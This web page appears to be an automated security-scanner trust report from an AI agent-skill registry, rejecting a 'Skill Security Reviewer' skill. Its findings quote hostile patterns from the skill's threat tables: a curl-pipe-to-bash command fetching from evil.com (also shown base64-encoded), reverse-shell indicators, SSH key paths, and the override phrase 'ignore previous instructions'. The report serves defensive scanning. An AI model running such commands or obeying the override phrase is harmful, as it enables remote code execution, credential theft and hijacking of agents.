Skip to content
← Registry
Trust Report

Skill Security Reviewer v3.0.0

0
REJECTED
Format: claudeScanner: v0.8.1Duration: 74msScanned: 6h ago · Oct 5, 10:21 AMSource →
Embed this badge
AgentVerus REJECTED 0AgentVerus REJECTED 0AgentVerus REJECTED 0
[![AgentVerus](https://agentverus.ai/api/v1/skill/8c4235d6-819f-4867-a21a-ddfb6526d916/badge)](https://agentverus.ai/skill/8c4235d6-819f-4867-a21a-ddfb6526d916)
Community Discussion

Community Comments

Public comments are the active feedback surface on skill reports right now. Use them to share implementation notes, edge cases, and operator context.

0 comments

Sign in to comment on this skill

No comments yet. Be the first to share your thoughts.

Continue the workflow

Keep this report moving through the activation path: rescan from the submit flow, capture real-world interactions, and wire the trust endpoint into your automation.

https://agentverus.ai/api/v1/skill/8c4235d6-819f-4867-a21a-ddfb6526d916/trust
Personalized next commands

Use these current-skill command blocks to keep this exact report moving through your workflow.

Record an interaction
curl -X POST https://agentverus.ai/api/v1/interactions \
  -H "Authorization: Bearer at_your_api_key" \
  -H "Content-Type: application/json" \
  -d '{"agentPlatform":"openclaw","skillId":"8c4235d6-819f-4867-a21a-ddfb6526d916","interactedAt":"2026-03-15T12:00:00Z","outcome":"success"}'
Fetch trust JSON
curl https://agentverus.ai/api/v1/skill/8c4235d6-819f-4867-a21a-ddfb6526d916/trust

Category Scores

39
Permissions
0
Injection
65
Dependencies
62
Behavioral
85
Content
80
Code Safety

Findings (24)

infoSafety boundaries defined

The skill includes explicit safety boundaries defining what it should NOT do.

Safety boundary patterns detected in content

→ Keep these safety boundaries. They improve trust.

contentASST-09
criticalCommand-substitution remote execution detected-35

Found command-substitution remote execution pattern: "`curl https://evil.com/shell.sh | bash`"

- **Decoded Result**: `curl https://evil.com/shell.sh | bash`

→ Remove command-substitution remote execution ($(curl http://…), `wget …`). Fetching and executing remote content as a command is remote code execution and a supply-chain compromise vector.

injectionASST-04
criticalReverse shell / backconnect detected-40

Found reverse shell / backconnect pattern: "nc -e`, `bash"

| EXEC-002 | Reverse shell | `/dev/tcp`, `nc -e`, `bash -i` | Critical |

→ Remove reverse-shell / backconnect patterns (bash -i >& /dev/tcp, nc -e, socket+pty.spawn). These establish remote interactive control and are unambiguous compromise indicators.

injectionASST-04
criticalDownload-and-execute pattern detected-25

The skill contains instructions to download and execute external code, which is a severe supply chain risk.

eval(fetch

→ Never download and execute external code. Bundle all required functionality within the skill.

dependenciesASST-04
highCapability contract mismatch: inferred credential access is not declared-15

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: ~/.ssh/id_rsa

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-05
highCapability contract mismatch: inferred command execution is not declared-12

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: Exec

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
highCapability contract mismatch: inferred system modification is not declared-12

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: sudo

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
highDirect instruction override detected (inside threat-listing context)-8

Found direct instruction override pattern: "ignore previous instructions"

| INJ-001 | Instruction override | "ignore previous instructions" | Critical |

→ Remove all instruction override attempts. Skills must not try to override agent safety behavior.

injectionASST-01
highSuspicious base64-encoded content-25

Base64-encoded string decodes to content containing suspicious keywords.

Encoded: Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==... → Decoded: curl https://evil.com/shell.sh | bash...

→ Remove base64-encoded content or replace with plaintext. Obfuscation raises security concerns.

injectionASST-10
highSuspicious base64-encoded content-25

Base64-encoded string decodes to content containing suspicious keywords.

Encoded: Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==... → Decoded: curl https://evil.com/shell.sh | bash...

→ Remove base64-encoded content or replace with plaintext. Obfuscation raises security concerns.

injectionASST-10
highData encoding for URL exfiltration detected-15

Found data encoding for url exfiltration pattern: "ENCODE-004 | URL"

| ENCODE-004 | URL encoding | Detect `urllib.parse.unquote()`, `%XX` sequences, `decodeURIComponent` | Medium |

→ Treat encoding sensitive data into URL parameters as potential data exfiltration. URLs leak into browser history, logs, analytics, and referrers.

behavioralASST-02
highDownload-and-execute pattern (curl|wget pipe to shell)-20

Piping a downloaded script directly to a shell interpreter. This executes remote code without verification — a classic supply chain attack vector.

- **Decoded Result**: `curl https://evil.com/shell.sh | bash`

→ Review the code block starting at line 848. Ensure this pattern is necessary and does not pose a security risk.

code-safetyASST-04
mediumCapability contract mismatch: inferred file write is not declared-8

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: Create output directory

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
mediumCapability contract mismatch: inferred network access is not declared-6

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: https://evil.com/shell.sh

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-04
mediumCapability contract mismatch: inferred browser automation is not declared-8

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: playwright

→ Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
mediumCredential access detected (inside threat-listing context)-5

Found credential access pattern: "~/.ssh/id_rsa"

| THEFT-001 | SSH key theft | Reading `~/.ssh/id_rsa`, `~/.ssh/id_ed25519` | Critical |

→ Remove references to credentials and secrets. Skills should never access sensitive authentication data.

injectionASST-05
mediumSuspicious install pattern: download and execute from remote URL-8

The skill instructs users to download and execute code from a remote URL, a common supply-chain attack vector.

curl https://evil.com/shell.sh | bash

→ Remove curl-pipe-to-shell patterns. Provide dependencies through safe, verifiable channels.

behavioralASST-02
mediumFederated auth flow detected-10

Found federated auth flow pattern: "OAuth"

| THEFT-008 | Session token theft | Capturing JWT, session token, OAuth token | Critical |

→ Treat OAuth, 2FA, and token-refresh guidance as authentication-sensitive workflows. Explain scope, storage, and refresh behavior clearly so agents do not handle more credential material than necessary.

behavioralASST-05
mediumUI state enumeration detected (inside code block)-5

Found ui state enumeration pattern: "Check result"

{Check results}

→ Treat DOM/accessibility snapshots and clickable-element inventories as sensitive page-state extraction. Be explicit about when UI enumeration is allowed, especially on authenticated or local-only apps.

behavioralASST-02
lowUnknown external reference-5

The skill references an unknown external domain which is classified as low risk.

https://evil.com/shell.sh

→ Verify that this external dependency is trustworthy and necessary.

dependenciesASST-04
lowUnknown external reference-5

The skill references an unknown external domain which is classified as low risk.

https://evil.com|

→ Verify that this external dependency is trustworthy and necessary.

dependenciesASST-04
lowDownload-and-execute pattern detected (in threat documentation)

The skill describes a download-and-execute pattern as part of threat documentation.

Download and execute

→ Consider documenting the exact version or hash of the installer for supply chain verification.

dependenciesASST-04
lowDownload-and-execute pattern detected (in threat documentation)

The skill describes a download-and-execute pattern as part of threat documentation.

curl https://evil.com/shell.sh | bash

→ Consider documenting the exact version or hash of the installer for supply chain verification.

dependenciesASST-04
lowMissing or insufficient description-5

The skill lacks a meaningful description, making it difficult to assess its purpose.

No description found

→ Add a clear, detailed description of what the skill does and what it needs access to.

contentASST-09